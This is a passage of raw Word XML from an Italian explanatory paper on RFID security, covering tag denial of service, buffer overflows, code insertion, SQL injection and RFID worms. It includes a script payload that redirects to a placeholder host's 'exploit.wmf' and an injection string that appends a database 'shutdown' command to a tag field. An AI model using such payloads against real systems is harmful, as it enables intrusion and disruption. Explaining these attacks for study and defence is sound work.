        <w:t>(c) Attacchi di “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>denial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> of service”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867FE" w:rsidRPr="00B867FE" w:rsidRDefault="00B867FE" w:rsidP="00B867FE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> possono essere distrutti, rimossi o in alcuni casi</w:t>
      </w:r>
      <w:r w:rsidR="00FF40DB">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>riprogrammati e cancellati</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867FE" w:rsidRPr="00B867FE" w:rsidRDefault="00B867FE" w:rsidP="00B867FE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> I lettori possono essere disturbati in radiofrequenza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867FE" w:rsidRPr="00B867FE" w:rsidRDefault="00B867FE" w:rsidP="00B867FE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Scenari d'attacco:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867FE" w:rsidRPr="00B867FE" w:rsidRDefault="00B867FE" w:rsidP="00B867FE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Distruzione,rimozione o riprogrammazione di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in un</w:t>
      </w:r>
      <w:r w:rsidR="00FF40DB">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>magazzino o negozio, con conseguente interruzione o</w:t>
      </w:r>
      <w:r w:rsidR="00F84672">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>rallentamento operativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B867FE" w:rsidRPr="00B867FE" w:rsidRDefault="00B867FE" w:rsidP="00B867FE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>- Utilizzo di un disturbatore in frequenza per nascondere</w:t>
      </w:r>
      <w:r w:rsidR="00F84672">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  oppure rimozione, distruzione o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B867FE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>riprogrammazione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00982" w:rsidRPr="00A4657F" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRDefault="00F00982" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">(d) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A4657F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Malware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRPr="00311BD2" w:rsidRDefault="00311BD2" w:rsidP="00311BD2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311BD2">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>I sistemi RFID interagiscono spesso con altri sistemi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00311BD2">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>informatici</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00524C97">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>middeleware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00524C97">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRDefault="00311BD2" w:rsidP="00311BD2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311BD2">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Le informazioni lette dai </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311BD2">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311BD2">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> non sono altro che </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>input che un sistema valuta o che tramite essi si accede a un database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033588F" w:rsidRDefault="00311BD2" w:rsidP="00311BD2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">La vulnerabilità di un sistema diventa proprio il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>rfid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">, il quale </w:t>
      </w:r>
      <w:r w:rsidR="0033588F">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>è l’”anello debole” dell’intero sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRDefault="00311BD2" w:rsidP="00311BD2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRPr="00311BD2" w:rsidRDefault="00311BD2" w:rsidP="00311BD2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00311BD2" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>overflows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRPr="008B3B17" w:rsidRDefault="00FB563C" w:rsidP="008B3B17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Potrebbe capitare che un sistema di lettura dei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tag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RFID sia programmato per leggere RFID specifici di 128bit. La</w:t>
      </w:r>
      <w:r w:rsidR="008B3B17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memoria allocata nel programma quindi potrebbe non essere maggiore della grandezza specificata. In questo modo,</w:t>
      </w:r>
      <w:r w:rsidR="008B3B17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potremmo portare all'interno del sistema di lettura un RFID grande 512bit cosicché la memoria del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middleware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B3B17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subisca un</w:t>
      </w:r>
      <w:r w:rsidR="008B3B17">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B3B17">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B3B17">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sovrascrivendo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dunque l'indirizzo di ritorno sullo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stack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in modo che quando si ha il</w:t>
      </w:r>
      <w:r w:rsidR="008B3B17">
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ritorno dalla procedura, si  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">verifichi un salto in un punto specifico della memoria del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tag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contenente codice maligno.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B3B17" w:rsidRDefault="008B3B17" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00311BD2" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Insertion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cross code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Se il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middleware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utilizzasse un componente web-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based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(interfaccia utente ad esempio), ci sarebbero maggiori</w:t>
      </w:r>
      <w:r w:rsidR="008B3B17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vulnerabilità'. Il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tag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rfid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infatti potrebbe contenere nella sezione data il seguente codice (javascript):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;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document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>='http://ip/exploit.wmf';&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00311BD2" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.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lastRenderedPageBreak/>
        <w:t>Supponiamo che ci sia un sistema di controllo (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middleware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 xml:space="preserve">) che legga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tag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 xml:space="preserve"> RFID in un magazzino. La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query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 xml:space="preserve"> del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 xml:space="preserve">database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sara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 xml:space="preserve"> simile a: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>"Merce: &lt;READ RFID&gt;"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 xml:space="preserve">Ora se noi scrivessimo nel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tag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 xml:space="preserve"> RFID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 xml:space="preserve">"Tavolo;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shutdown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>"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 xml:space="preserve">il sistema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middleware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 xml:space="preserve"> processerebbe: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 xml:space="preserve">"Merce: Tavolo;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shutdown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>"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>Supponendo che il simbolo ; indica la fine di un'istruzione e l'inizio della nuova, il risultato che avremmo sarebbe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>La sicurezza degli RFID 3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>simile a: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 xml:space="preserve">"XYZ; database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shutdown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 xml:space="preserve">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completed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>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00FB563C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>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPS-BoldMT" w:hAnsi="TimesNewRomanPS-BoldMT" w:cs="TimesNewRomanPS-BoldMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tale attacco non è certamente un virus, ma è certamente un pericolo dato che un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPS-BoldMT" w:hAnsi="TimesNewRomanPS-BoldMT" w:cs="TimesNewRomanPS-BoldMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPS-BoldMT" w:hAnsi="TimesNewRomanPS-BoldMT" w:cs="TimesNewRomanPS-BoldMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ha la possibilità di</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>spegnere a suo piacimento il database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRDefault="00311BD2" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times-Bold~2c" w:hAnsi="Times-Bold~2c" w:cs="Times-Bold~2c"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRDefault="00311BD2" w:rsidP="00F00982">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t>RFID-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t>Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t xml:space="preserve"> Worms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRPr="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t xml:space="preserve">RFID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t>Worm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRPr="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t>- Semplici exploit che scaricano ed eseguono del codice che si propaga</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB563C" w:rsidRPr="00FB563C" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t xml:space="preserve">sulla rete e tramite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB563C">
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
        </w:rPr>
        <w:t xml:space="preserve"> RFID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00311BD2" w:rsidRPr="00050355" w:rsidRDefault="00FB563C" w:rsidP="00FB563C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="font332" w:hAnsi="font332" w:cs="font332"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
